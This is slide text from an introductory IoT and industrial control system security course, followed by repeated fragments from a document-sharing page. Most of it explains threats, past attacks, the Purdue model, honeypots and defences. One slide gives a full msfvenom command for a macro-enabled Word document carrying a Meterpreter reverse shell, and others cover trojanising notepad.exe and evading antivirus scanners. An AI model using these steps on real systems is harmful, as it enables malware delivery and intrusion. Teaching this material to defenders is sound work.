Safaripearsoniotsecurity 1575578603468

IoT
Security
Click to edit Master title style
Securing Internet of Things and Critical

infrastructure Industrial Control (ICS) Systems
Aamir Lakhani
Twitter: @aamirlakhani
Aamir.Lakhani@
Course Goals and Objectives
• This is an introduction course to IoT and ICS cybersecurity.
• Learn the fundamentals of IoT Cybersecurity systems and their
components
• Learn about the ICS/SCADA threats and the threat actors
• Get an inside look at the most popular and successful attacks
against IoT devices.
• Review tools and techniques, you can use to test and audit IoT
devices across different industries systems
• Gain an understanding of theoretical defensive frameworks used
to protect IoT and critical infrastructure.
• Explore tools you can use to implement in your environment to
secure IoT systems.
Why is this training important
• There are going to millions of new IoT devices every
year. IoT is becoming functional but adding security
risks.
• Malware targeting IoT devices is becoming more

common and having massive effects on the Internet
and cybersecurity
• Most people don’t understand functions of critical

infrastructure.
What you will take with you
• Learn the fundamentals of IoT Cybersecurity systems and
their components
• Gain an understanding of theoretical defensive frameworks
used to protect IoT and critical infrastructure
• Explore tools you can use to implement in your environment
to secure IoT systems.
Who am I
• Aamir Lakhani
About the Instructor
• Red Team Researcher, Incident response specialist, digital
forensics specialist.
• Twitter: @aamirlakhani Email: aamir.Lakhani@me.com
Part 1: Introduction to IoT
• Why are IoT devices extremely valuable to organizations
• The types of threats and vulnerabilities they introduce
• A look at recent attacks against IoT Infrastructure
• Understanding the Internet of very vulnerable Things
• Introduction into basic critical infrastructure IoT devices
• Common Components of Systems
• Introduction into industrial control systems
• Introduction into SCADA
• Cybersecurity risks and concerns into IoT critical infrastructure
• OPSEC
• Deployment Methodologies and Segmentation Concerns
Part 2: Cybersecurity and Critical
Infrastructure (
• IoT Threat Landscape and Threat Actors targeting systems
• Historic look at significant and modern threats
• Modern attacks against systems using Pen Testing tools
• Exploiting systems and gaining access against systems
Part 3: IoT Honeypots
• Using IoT Honeypots
• Using network segmentation services
• Auditing networks
Part 4: Putting it All Together
• Review of lessons
• Next Steps
• Conclusion
Part 1: IoT Infrastructure
Introduction to IoT Infrastructure (1 hour)

POLL: What is your experience?
1. I am an expert on IoT and ICS cybersecurity
2. I have or am working with cybersecurity on IoT and ICS
products
3. I have some decent idea of cyber IoT and ICS security,
but this is my first real introduction into the topic
4. I have no idea about these types of technology and am
here to be introduced to the topic
What are IoT Devices
• Thermostat
• Cars
• Smart Devices
• Smart Meters
• Mining Equipment
• Data Center Physical Access
• Equipment at airports
• Kiosks
• Light Bulbs
• AC / HVAC Systems
Internet of Things Devices
• There will be around 400 million IoT devices with cellular
connections at the end of 2016
• In 2018, mobile phones are expected to be surpassed in
numbers by IoT devices
• 70% of wide-area IoT devices will use cellular technology in
2022
Source: https://www.ericsson.com/en/mobility-report/internet-
of-things-forecast
Mirai Botnet
• Turned IoT devices into “bots”
• Primary targeted cameras and home routers
• First discovered in August 2016
• Responsible for October 2016 Dyn attack
• Named after animie series Mirai Nikki
• Source Code posted to Hack Forums
• Has inspired numerous other malware and different versions
Mirai Botnet
Source: Imperva
DynClick to edit Master title style
Cyberattack (October 2016)
• DDoS made over 50% of the Internet unavailable within the
America’s
• Large concentrations were not available in Europe
• Most attack sources were IP cameras, DVD players, Smart
TVs, routers, and other consumer devices.
• Dyn estimated at one point more than 100,000 endpoints
were attacking its servers.
• Attack generated 1.2 Tbps
IoT Denial of Service Threats
• Attacker deliberately tries to cause a capacity overload in the
victim’s system by sending data streams.
• They don’t need to steal or view data to be successful
• They slow down the business and make productivity difficult
• Prevents legitimate traffic and business from traversing
networks
• They damage reputation
• Most IoT devices still have capable network interfaces
capable of generating lots of data.
Cryptomining
• Consumer IoT devices are becoming popular for attackers to
mine for cryptocurrency
• Not much processing power. 1 Device might $0.20 - $0.90 per
day
• Thousands of devices means pennies add up quickly to dollars
• Over multiple days, weeks this can mean decent amounts of
money being generated
• Some devices such as media devices, TVs, and others have 4K
processing units which make them powerful mining
machines.
Advanced Persistent Threats
• Attackers in network will use IoT devices as a method to hid
their permanent connection into networks
• Attacker’s understand if their intrusions are detected PCs may
be cleaned, but IoT devices are often not reset.
• IoT devices are sometimes easier to exploit, and attackers use
them as jumping off points to discover and attack the rest of
the network.
Disruption
• Attackers will change settings on IoT devices
• Chemical plants could have safety measures turned off
• Thermostat temperatures may be set to hot
• Food manufacturing devices may have formulas of food
mixing altered.
• Devices may cause a disruption in work
Surveillance / Recording
• IoT microphones and cameras used to record people
• Attackers may listen in on people and devices
• Attacks are seen on smartphones, baby monitors, smart
switches.
Why Do Organizations Use IoT Devices
• Security (Cameras, door access readers, parking access)
• Automation (cleaning devices, lights, advertisement)
• Data Center (cabinet access, kiosk access)
• Users using them
• Purchased but don’t realize they have smart features
Industrial IoT
• Smart Robots in warehouses
• Factory Floor vehicles
• Mining Equipment
• Bottle and Packaging Tracking and
Fulfillment
• Rotators, mixers, balancers in chemical
and medical
• Self-driving in cars, trains, and planes
What are common components?
• Limited Operating System screens
• Limited to simple instructions, LCDs, or buttons
• ARM-based or similar (low powered processors)
• Integrated networking (wireless or wired). Normally COTS
(commercial, off-the-shelf) networking hardware.
• Sensors (motion, sound)
Common Operating Systems
• IPv6 Support
• Contiki
• Wireless Support
• Android Things
• WPA PSK
• RioT • 2.4 Ghz
• Apache Mynewt • Bluetooth, Zigbee, NB-IoT, others
• Huawaei LightOS • Multitasking
• TinyOS • C Language
• Windows IoT • 1-10Kb Kernal
• Raspian • 40Kb – 2Mb Memory requirements
• Amazon Free RTOS • Java, Go, Dart, Python Development Support
Critical Infrastructure
What is Critical Infrastructure?

§ Department of Homeland
security has identified 16 sectors
of critical infrastructure
§ These sectors have some sort
dependence on Internet for
operations, management, and
automation.
§ These are the systems that
attackers target
https://www.dhs.gov/critical-infrastructure-sectors
Critical Infrastructure Sectors
§ Chemical Plants
§ Dams
§ Communication Infrastructure
§ Powerlines and Power Grids
§ Energy Sector
§ Financial Service Sector
§ Water and Wastewater
§ Food and Agriculture
ICS Hacking in the News
Source: https://thehackernews.com/search/label/ICS%20Hacking
Source: https://www.cyberscoop.com/north-korea-ics-hacking-dhs-ics-cert/
Source: https://securityintelligence.com/news/critical-vulnerabilities-put-ics-security-at-risk/
Source: https://threatpost.com/attacking-ics-systems-like-hacking-in-the-1980s/104200/
Why Critical Infrastructure?
§ Had a reputation (right or wrongly) as an easy target
§ Visible for attackers to gain reputation
§ Ransom targets
§ Create distractions
§ Cyber Warfare / Attacks against the homeland
ICS Malware and Attack Surface
§ Over 114 advisories issued on ICS-CERT for 2018
§ ICS Malware is very advanced
» 2010 - Stuxnet
» 2013 - Havex
» 2015 - BlackEnergy2
» 2016 - Crash Override / Industroyer
» 2017 / 2018 - Triton
§ Analysis of advisories:
» Default or known username of passwords
» Configuration errors / software bugs
» Cross-Site scripting attacks
» Leaking information
Common attack vulnerabilities
§ Poorly configured firewalls and security systems
§ Peer Utility Links
§ Database Links
§ Dial-up access or secondary network management connections
§ VPNs
§ Man-in-the-Middle attacks
§ Phishing
Critical Infrastructure Hacking

Tools
How ICS Hacking works
Common attack tools
§ SCADA Bones
§ Metasploit
§ Agora Pack
§ Immunity Canvas
§ Custom tools
Scanning and Vulnerability Testing??
Image is a screen capture from the movie, “Me, Myself, and Irene”
Attack Groups
§ Covellite
» Spear-Phishing campaigns
targeting US ICS
§ Dymalloy
» Attacks in US, Canada,
Europe, Turkey
§ Electrum
» 2016 Ukraine power grid
attack
» Creators of CrashOverride
» Sandworm APT
Dark Web Market Place
Skill Squatting – How It Works
Criminals
Sound-alike Publish
Skill "Name” Skill
Alexa, open User enables

“Skill Name” "Skill”
Voice AI Source Code – Darknet Chatter
Looking for Offers
Workflow
Automation
Digital Assistant
Drones – Bank Roof Top
Rogue Drones
Credit Suisse
Acid Drops into Data

Center
Drones – Darknet Listing
NFZ Bypass
$50
Yuneec Drones
ICS Leaked Credentials
Shodan
• Search engine for Internet of
Things
• Finds ports and services
• Allows attackers to find open
systems
• Attackers have found power
grids, critical infrastructure,
and other services open
• Lots of open cameras,
routers, servers
Autosploit
• Finds systems with Shodan
• Finds Exploits with Metasploits
• Allows massive attacks
Please excuse my wind
ICS Reconnaissance for an attack
(sample attack)
Defending Critical Infrastructure

Why are ICS systems difficult to protect
• Newer systems have security and flexibility in mind
• However, many older systems exist because of the cost to replace them.
• Government mandates and regulation help speed up adoption of new system.
• Older systems work
• Fear things will stop working
• Expertise is no longer around or understood
• ”If it isn't broke, don’t fix it”
• Systems are sensitive to security
• Laughable defense
• Systems are sensitive to delays and routing because of protocols such as multicast
• “We haven’t been hacked; we are not a target”
Signatures?
• Digital Hash
• Unique Identifier Static Signature
• “WormChecksum”
• Known Packer
• Unknown Packer Code Emulation
• Debuggers
• Patterns
• Malicious Behaviors Behavioral
• Smart Signatures
• OS Level Virtualization
• Sandbox / Container Virtual Execution
• Dynamic Analysis
• Machine Deep Analysis

• Neural Networks Machine Learning
• Training Sets
20 Malware Files 80 Clean Files
C:\windows\start menu\programs\startup
* [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders] If a file contains a
Startup="C:\windows\start menu\programs\startup"
* [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
startup registry key,
Startup="C:\windows\start menu\programs\startup"
* [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\User Shell Folders]
what is the
20 Malicious Files
"Common Startup"="C:\windows\start menu\programs\startup" likelihood the file is
* [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Folders]
"Common Startup"="C:\windows\start menu\programs\startup" malicious?
80%
80 Clean Files
Other Features that make malicious
files (example)
Startup registry entries 80%
Long sleep timers 50%
Windows Scheduled Tasks / AT Commands 60%
Spawn new processes 80%
Delete Shadow files 90%

What can you do to protect your
systems
• Internal segmentation
• Organizations that implement internal segmentation firewalls
greatly reduce their risk and attack surface.
• Attackers will pick an easier target
• Dedicated ICS protection
• OEMs that have cyber researchers and teams dedicated to finding
and combating ICS and other related threats
• Specialized products and licenses for these types of protections.
• Good cyber hygiene
• Attackers use a variety of attacks such as phishing and drive-by
downloads
Part 2: IoT Infrastructure
Cybersecurity and Critical Infrastructure

POLL: Do you work in OT?
1. I work primarily in OT Security
2. I work in both OT and IT cybersecurity, primarily in OT
3. I work in both OT and IT cybersecurity, primarily in IT
4. I work primarily in IT cybersecurity
5. I don’t work in either IT or OT cybersecurity
6. What is OT?
Purdue Model
Purdue Model
• Reference model used in critical infrastructure
• Based on 5 Levels (level 0 – 4)
• Level 0: Physical access and physical processes
• Level 1: Sensors, or SCADA systems
• Level 2: HMI (human control interface), SCADA software
• Level 3: Manufacturing processes, lab equipment, management
• Level 4: Business, scheduling, shipping, inventory, ERP, timecards, company
Intranet, company social media
https://en.wikipedia.org/wiki/Purdue_Enterprise_Reference_Architecture
Purdue Model
https://en.wikipedia.org/wiki/Purdue_Enterprise_Reference_Architecture
ICS Basic Components

Basic SCADA Diagram
Sensors
PLC / RTU HMI
Physical
Process
Monitoring
Management
and Logging
workstation
workstation
What is SCADA
• Sensors that communicate operation, operation mode,
downtime
• Is a drill spinning? Is the water hot? Is trash bin full? Does the
filter need to be changed?
• Almost all modern industries use SCADA sensors
• SCADA versions communicate in different ways
• Some use serial communications, some such as Modbus IP
use IP communications.
Modbus
• It is a communications protocol (maintained by Schneider
Eclectic)
• Multiple versions including serial and IP based
• Royalty-free and the defacto standard with most PLC
controllers
• Modbus TCP (TCP RTU) runs over TCP port 502
Basic SCADA Diagram
Sensors
PLC / RTU HMI

Level 0/1
Physical Level 1 Level 2

Process Level 4
Monitoring
Management
Level 0 Level 3 and Logging
workstation
workstation
ICS Attacks
Stuxnet
• Discovered in 2010. In development since 2005
• Believed to cause major damage to the Iranian
nuclear program
• Believed to be co-developed by US and Israeli
governments
• Targeted PLC controllers. Used 4 zero-days to gain
control
• It infected “air gapped” environments via USB stick
• Turn up pressure in nuclear reactors
• Turn off oil pipelines
• First cyber weapon
• First weapon made up entirely of code
What happened
• Uranium-235 separation is critically dependent on the speed
of rotation on the centrifuges
• High speed is helpful, but causes the equipment to shake
• Shaking can cause major failures to occur.
Shaking
https://www.youtube.com/watch?v=LV_UuzEznHs
What happened
• Uranium-235 separation is critically dependent on the speed
of rotation on the centrifuges
• High speed is helpful, but causes the equipment to shake
• Shaking can cause major failures to occur.
• The malware caused software (code issues)
• The malware was kinetic – meaning it caused physical
damage
• Destroying physical generators and machinery is much
hardware to recover from.
Ukrainian Power Attacks (2015, 2016)
• Over 250K people lost electricity on a few occasions
• Malware, Phishing Attacks, Remote Control, Destructive
sequences, and denial of service attacks were all used against
the power grids
• SCADA systems running on IP were targeted, along with user
interface machines running Windows software.
Crash Override Attack 2017
• Malware was named “Crash Override”
• It affected 1/5 of Kiev’s population in Ukraine
• Disrupted signals infrastructure so administrators could
communicate or send commands.
• It was able to send its own command
• Can manipulate circuit breakers to open or shut states
• Potentially taking down substations and leaving them offline
• Extremely modular, can be adapted for multiple systems
POLL: Have you used Metasploit
1. Yes
2. No
3. Maybe, I am not sure
ICS
Hacking Tools
Techniques
Threat Actors
Silent Trinity
• SILENTTRINITY is command and control
exploit powered by Python 3
• It creates ”listeners” that an attacker
waits for a victim to connect
• When a victim connects the attacker
can control the PC
• Attacker can dump passwords
• Control webcam
• Infect system with ransomware
Silent Trinity Main Menu
Silent Trinity Modules
How do these attacks get on systems?
• Phishing emails claiming to be legitimate programs or
updates
• Convincing contractors or other people to infect or update
systems
• Infecting legitimate programs with malicious updates
Infecting a legitimate program
• Get an exe or something that is safe (we will use
notepad.exe)
• Make sure you command, and control server is accessible via
the Internet or from your victim via IP address
• Multiple tools available, we will use Metasploit just for
demonstration purposes
Metasploit
AV Evasion
• Multiple Frameworks are available to
avoid AV detection
• Do not upload to VirusTotal to test
• NoDistribute is a better site ($3 - $13
per month)
• Real Attackers will use their own
systems and virus scanners
• They will update scanners then
disconnect from the Internet
Throwing Star LAN Tap
• Throwing Star LAN Tap (J1 and J2) in line with a target
network to be monitored.
• Use Ethernet cables to connect one or both of the
monitoring ports (J3 and J4) to ports on one or two
monitoring stations. Each port monitors traffic in one
direction only
• Use your favorite software (e.g., tcpdump or
Wireshark) on the monitoring station(s) to capture
network traffic
• The Throwing Star LAN Tap is a passive Ethernet tap,
requiring no power for operation.
Ubertooth One
• Scan and intercept bluetooth signals
• Capture and replay Bluetooth packets
• Multiple projects on Github that break into Bluetooth devices
HACKRF ONE
• Transmits and intercepts radio signals
from 1 MHz to 6 GHz
• Sniff, transmit, and replay radio signals
• Unlocking cars
• Unlocking garage and security gates
• View public service transmissions
• View pager transmissions
Mitre ATT@CK
• MITRE ATT&CK™ is a globally-accessible knowledge base of
adversary tactics and techniques based on real-world
observations. The ATT&CK knowledge base is used as a
foundation for the development of specific threat models and
methodologies in the private sector, in government, and in
the cybersecurity product and service community
Leafminer
• Iranian based threat group
• Attacks business and organizations in the Middle East
• Has attempted to disrupt oil and gas production and
distribution
MITRE ATT@CK Leakminer
OilRig
• They use basic techniques we have already discussed
• Attacks are not sophisticated, but they are extremely
persistent
• They take many open-source tools and rebrand them
• They used DNS hijacking attacks
OilRig on MITRE
Hexane
• Targeting Oil and Gas companies and infrastructure in the
Middle East
• Drops Malicious documents with scripts thru Phishing attacks
• They have targeted supply chains and third-parties to gain
access into systems
How to weaponize document
• root@kali: # msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp
LHOST=192.168.1.101 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe
Creates weponized word document
• User must enable Macros for it to work
Social Engineering Attacks
SET – Social Engineering Toolkit
• The Social-Engineer Toolkit is an open-source penetration
testing framework designed for social engineering. SET has a
number of custom attack vectors that allow you to make a
believable attack quickly.
• Simulate attacks that we discussed
• Test Phishing attacks, site cloning, email SPAM
Summary of Lesson
• Attacks against IoT and ICS environments are not complicated
• Most use known methods such as phishing
• However, some attacks probably created by governments are
extremely complex and sophisticated
• Threat actors know they can disrupt processes,
manufacturing, distribution.
Part 3: Securing IoT
Introduction to IoT Infrastructure (1 hour)

Segmentation
POLL: What is your experience?
1. We currently do advanced segmentation based on
application policies. This includes things like NAC and
802.1x deployments
2. We have VLAN (layer-2) segmentation via routers and
firewalls (layer-3)
3. We use application and user-based trust token for data
access and don’t need segmentation
4. We have a flat network
Segmentation
• Identifying critical resource segments
• Segmenting from a network perspective for management
• Segmenting from a policy and access perspective
• Segmenting from an access and monitoring perspective
Note:
• The following two slides are used by permission from a
vendor
• This course is not endorsing or recommending a vendor
Fortinet’s Intent Based Segmentation
• Source: Fortinet
https://docs.fortinet.com/document/fortigate/6.0.0/cookb
ook/724439/fortinet-security-fabric-installation
• Source: Fortinet, used by permission

POLL: Have you heard of deception technologies?
1. I know exactly what it is and have used it.
2. I know what is and might have played with it.
3. I have heard of it, and not much else
4. Never heard of it
Honeypots
HoneyPots
• A honeypot is a computer system that is
set up to act as a decoy to lure
cyberattackers, and to detect, deflect or
study attempts to gain unauthorized
access to information systems.
• Allows us to learn from attacker

techniques and test new attacks in the
wild
• High Interaction and low interaction

honeypots
Setting up Honeypots
• 2 public addresses
• 1 for management
• 1 for honeypot services
• No NAT
• Some attacker services are not correctly recorded with NAT
• VPS services
• Lots of attacks will cause termination of services
• Honeypot compromises
• Used to host malware

• Illegal content
Log Management
Source: https://www.threatstream.com
Source: https://www.anomali.com
Snort
• Used with honeypots to capture
signature-based threat data
• Used to capture PCAPs
• There are better

ways to do this
Other fun stuff
• Open up “listen” ports for major malware attacks
• Mimic ports on major devices (IoT) and use logs and PCAPs
• Create Windows systems with malware URL feed
• Run malware sites thru a non-admin account
• If compromised you might have found a zero day
• Open FTP server (or one that can be brute forced easily)
ConPot
• Conpot is a low interactive server side Industrial Control
Systems honeypot designed to be easy to deploy, modify and
extend. By providing a range of common industrial control
protocols we created the basics to build your own system,
capable to emulate complex infrastructures to convince an
adversary that he just found a huge industrial complex.
• Emulates devices such as a Siemens S7-200 PLC or a Guardian
AST tank monitor
Honeypot results
• On a public server saw dozens to sometimes hundreds of
login attempts
• When default settings were changed and and environment
was built (web sites) saw targeted attacks
• Saw new code and zero day attempts
Commercial Homeypots
• Fortinet – FortiDeceptor
• Attivio - BOTsink
• Fidelis – Fidelis Deception
• TrapX – DeceptionGrid
• Illusive – Illusive Platform
Benefits of commercial tools
• Enterprise setup and support
• Customization services
• Updates and research available
• Integration into your environment
• Less of a chance of compromising your own network
• Normally better logging and alerting out of the box
Scanning for vulnerabilities
• Scan for open ports
using nmap (Zenmap
is the GUI)
• Scan for
vulnerabilities using
nmap scripts
• Scan for
vulnerabilities using
vulnerability scanners
Vulnerability Scanner
• Looks at more than just
open ports
• Scans for versions of
applications and operating
systems
• Compares those against
known vulnerabilities and
exploits
• OpenVAS shown
Part 4: Putting it all

together
Introduction to IoT Infrastructure (15 minutes)
The Internet of Very Bad Things
• IoT and ICS devices have massive footprints
• They are being attacked continuously and create footholds (initial
access) for attackers
• IoT and ICS attacks can cause disruption in governments.
• Governments have created sophisticated attacks
• Devices on the Internet with open ports are indexed by Shodan
• Other devices can be scanned
What’s next?
• US Government has free training: https://ics-cert-training.inl.gov/learn
• Many classes available from training organizations and free YouTube
• Learn basic hardware hacking with Ubertooth One and HackRF One
• Learn about SNR (software defined radios) – lots of free training on
YouTube
PLC Hacking
• Velocio ACE PLC Product
• http://velocio.net/ace/
• Great tool to learn basic point and

click style PLC programming and
Hacking
• Lots of projects
Raspberry Pi Projects
• Biometric Lock
• Noise Detector
• Real-time movement device
• Air Pollution Meter
• Air Traffic Control relay
• Smart Garage Door Opener
• Automated Blinds
• Baggage Tracker
Other resources
Thank You
Introduction to IoT
Infrastructure
Aamir Lakhani
Twitter: @aamirlakhani
Email: aamir.Lakhani@me.com

Safaripearsoniotsecurity 1575578603468

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Safaripearsoniotsecurity 1575578603468

Uploaded by

Copyright:

Available Formats

IoT

Securing Internet of Things and Critical

• Malware targeting IoT devices is becoming more

• Most people don’t understand functions of critical

Part 1: IoT Infrastructure

Introduction to IoT Infrastructure (1 hour)

What is Critical Infrastructure?

Critical Infrastructure Hacking

Scanning and Vulnerability Testing??

Alexa, open User enables

Acid Drops into Data

Defending Critical Infrastructure

• Machine Deep Analysis

Long sleep timers 50%

Windows Scheduled Tasks / AT Commands 60%

Spawn new processes 80%

Delete Shadow files 90%

Part 2: IoT Infrastructure

Cybersecurity and Critical Infrastructure

ICS Basic Components

PLC / RTU HMI

PLC / RTU HMI

Physical Level 1 Level 2

Part 3: Securing IoT

Introduction to IoT Infrastructure (1 hour)

• Source: Fortinet, used by permission

• Allows us to learn from attacker

• High Interaction and low interaction

• Some attacker services are not correctly recorded with NAT

• Lots of attacks will cause termination of services

• Used to host malware

• There are better

Part 4: Putting it all

• Great tool to learn basic point and

You might also like